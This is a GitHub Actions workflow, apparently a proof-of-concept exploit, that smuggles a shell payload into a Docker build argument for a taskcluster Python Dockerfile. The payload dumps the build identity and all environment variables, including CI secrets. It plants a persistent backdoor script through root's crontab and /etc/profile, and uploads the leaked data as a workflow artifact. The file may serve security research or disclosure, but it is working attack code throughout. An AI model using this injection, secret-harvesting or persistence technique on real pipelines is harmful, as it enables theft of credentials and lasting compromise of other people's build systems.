name: Critical RCE & Sensitive Data Leak with Persistent Backdoor
on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
      secrets: read

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Prepare Dockerfile and Payload
        run: |
          mkdir -p ./taskcluster/docker/python
          cp Dockerfile ./taskcluster/docker/python/

          PAYLOAD=$(cat <<'EOF'
echo "[INFO] Dumping internal CI context..."
{
  echo "----- ID -----"
  id
  echo "----- ENV -----"
  printenv
} > /leaks.txt

echo "[INFO] Installing persistent runtime backdoor..."
echo '#!/bin/sh' > /usr/local/bin/init.sh
echo 'echo "[BACKDOOR] Runtime triggered at $(date)" >> /runtime-leak.log' >> /usr/local/bin/init.sh
echo 'printenv >> /runtime-leak.log' >> /usr/local/bin/init.sh
chmod +x /usr/local/bin/init.sh
echo "@reboot /usr/local/bin/init.sh" >> /etc/crontabs/root
echo '/usr/local/bin/init.sh' >> /etc/profile
EOF
          )

          docker build --build-arg PYTHON_VERSION="$PAYLOAD" -t compromised ./taskcluster/docker/python

          docker run --rm compromised cat /leaks.txt > output.txt

      - name: Upload Leak Artifact
        uses: actions/upload-artifact@v4
        with:
          name: ci-leaks
          path: output.txt
